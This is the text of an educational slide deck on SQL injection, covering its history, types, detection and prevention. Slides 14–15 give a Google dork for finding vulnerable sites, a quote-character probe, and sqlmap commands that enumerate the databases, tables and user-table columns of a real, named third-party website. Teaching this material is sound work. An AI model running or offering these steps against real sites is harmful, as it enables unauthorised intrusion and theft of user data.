Sql Injection
Download as PPTX, PDF0 likes274 views
SQL injection is a critical web application vulnerability that allows attackers to execute arbitrary SQL commands through non-validated user inputs, potentially compromising sensitive data like usernames and passwords. The document covers the history of SQL injection attacks, including notable incidents involving companies like Starbucks and Sony, and discusses various types of SQL injection and their detection and prevention methods. Tools like SQLMap are mentioned for penetration testing, highlighting the importance of sanitizing inputs and implementing strong security measures.
Sql Injection
- 1. SQL INJECTION AJU MATHEW THOMAS 1
- 2. What is SQL Injection • A technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. • Basic objective is to pull the database information existing behind a webserver that will contain information about the website like username,passwords, admin details , and other relevant information related to a website etc. • It’s an exploit that a hacker use to gather information from a database 2
- 3. Overview – Cont. • Hackers can use SQL injection to add,modify, and delete records in the database • Gives an adversary complete control over the web application database. • It can any affect any web application that uses an SQL database such as my SQL , Oracle , SQL server etc. • Considered as one of the most prevalent and most dangerous web application vulnerabilities. • It is also listed as one of the top ten web application vulnerabilities in OWASP Top Ten 3
- 4. 4
- 5. Injection Mechanism • Injection mechanism are mainly of two types (i) First order injection (ii) Second order injection • First order injection (i) Injection through user inputs (ii) Injection through cookies (iii) Injection through server variables. • First order injection Processes the input and causes the attacker’s injected SQL query to execute • Second order injection Stores the user input for future use and responds to the request. When attacker submits a second request , The application retrieves the stored input and processes it causing the attacker’s injected SQL query to execute 5
- 6. History of SQLI • SQL injection was first discovered in 1998 • Jeff Forristal was one of the first people to ever document SQL injection • Few Exploits recorded in the past: (1) CVE-2019-1010248 – Synetics GmBH I-doit 1.12 and earlier was affected by SQL injection. Impact was unauthenticated access to My SQL database. Component was a web login form. The attack vector is : Sending a malicious HTTP POST request. (2) CVE-2019-1010259 –Saltstack Salt 2018.3 ,2019.2 – An attacker could escalate privileges on My SQL server deployed by cloud server. It leads to RCE. 6
- 7. History of SQLI Attacks • SQLI attacks are predominant since its inception and there have been a lot of attacks that happened in the past due to SQLI which impacted a huge loss to many of the organizations. • Starbucks Attack Aug 2019 – A critical SQL injection vulnerability existed on a Starbucks enterprise database that may have exposed internal financial and accounting records. The vulnerability was discovered through a vulnerability discovery program run by Hackerone on the behalf of Starbucks. The vulnerability can give access to taxes, receipts, payroll data and all other information held on an exposed accounting database. 7
- 8. History of SQLI Attacks(Cont.) • Sony Music Attacks May 2011 - A group of hackers performed SQL injection attack techniques to expose sensitive user records on Sony Music Japan and also on Sony BMG Greece on May 21 2011. • There were two PHP pages that were vulnerable to SQL Injection on Sony Music Japan Site • Data leaked from the attack on Sony BMG Greece included username,real names ,and email addresses of users registered on the Sony Music.gr site. This attack appears to have used an automated SQL injection tool to find the flaw. • The database information that was published from Sony Music Japan did not contain names, passwords or other personally identifiable information. 8
- 9. History of SQLI Attacks(Cont.) • An SQL injection attack was used to steal the personal details of 156,959 customers from British telecommunications company TalkTalk's servers, exploiting a vulnerability in a legacy web portal 9
- 10. Types of SQL Injections • SQL injections typically fall under three categories (i) In-band SQLi(Classic) , Inferential SQLi(Blind) and Out of band SQLi. • In-band SQLi Attacker uses same channel of communication to launch their attacks and to gather results. The two subvariants are : o Error based SQLi – Performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the databse oUnion based SQLi – uses UNION sql operator which fuses multiple select statements generated by the database to get a single HTTP Response 10
- 11. Types of SQL Injections • Blind SQLi Used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. • The vulnerability page may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. • Out of band SQLi Can use this attack only when certain features are enabled on the database server used by the web application.Out of band SQLi is performed when the attacker can’t use the same channel to launch attack and gather information or when a server is too slow or unstable for these actions to be performed. 11
- 12. Detection of SQL Injection • Detection is an important component of mitigating the risk of SQL injection attack. • A WAF (Web Application Firewall) can detect and block basic SQL injection attacks. • IDS(Both network and host-based) can be tuned to detect SQL injection attacks. • Network based IDSes can monitor all connections to your database server and can flag suspicious activity. • Hosted based IDS can monitor web server logs and alert when something strange happens. 12
- 13. Prevention of SQL Injection Attacks • Sanitize database inputs. Any input to the web application database should be considered untrustworthy and should be dealt accordingly. • Developers must follow the principle of white listing the input validation • Use ‘prepared’ statements with parameterized queries, and to escape all user supplied input. • Limit the account privileges of the database user. Also give the web application the minimum privileges it needs to run. • Stored procedures can also make SQLI a lot harder. 13
- 14. SQL injection Attacks using SQL MAP • SQL Map An open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. • PHP ID vulnerability PHP ID vulnerability in websites are more prone to SQL injection attacks. Search engines like google can index websites that can contain the following line “php?id=1” in the URL. Attackers can make use of this vulnerability to perform SQLI attacks • Type the following the line in google search “inurl: php?id=1”. It will list out all URLs that contains the above phrase. • A website can checked for SQLI vulnerability by appending a ‘ symbol at the end of the URL. If the content changes then it indicates that it is prone to SQL injection attacks 14
- 15. Working of sqlmap • Open ‘sqlmap’ in Terminal and type the command “sqlmap –h to see the list of options which are available • Type the command sqlmap –u http://www.pha.org.pk/sro_list.php?catid=1 –dbs • Here u URL of the website • dbs To list out all the available databases related to the website • To get the tables sqlmap –u http://www.pha.org.pk/sro_list.php?catid=1 -D pha –tables • To get the columns sqlmap –u http://www.pha.org.pk/sro_list.php?catid=1 –D pha –T cp_user --columns 15
- 16. Bibliography 1) https://portswigger.net/daily-swig/sql-injection-flaw-opened-doorway-to-starbucks- accounting-database 2) https://www.csoonline.com/article/3257429/what-is-sql-injection-how-sqli-attacks-work- and-how-to-prevent-them.html 3) https://www.eweek.com/blogs/security-watch/sony-woes-continue-with-sql-injection- attacks 4) CEH module V9 on SQL Injection 5) Hackersploit – SQL Injection https://www.youtube.com/watch?v=3ZFblGx5v94 6) https://www.vice.com/en_us/article/aekzez/the-history-of-sql-injection-the-hack-that-will- never-go-away 7) SQL Injection for Beginners - https://www.youtube.com/watch?v=oWHKIiRGjtQ 8) https://www.cvedetails.com/vulnerability-list/opsqli-1/sql-injection.html 9) www.sqlmap.org 10) https://www.imperva.com/learn/application-security/sql-injection-sqli 11) https://en.wikipedia.org/wiki/SQL_injection 16
- 17. THANK YOU 17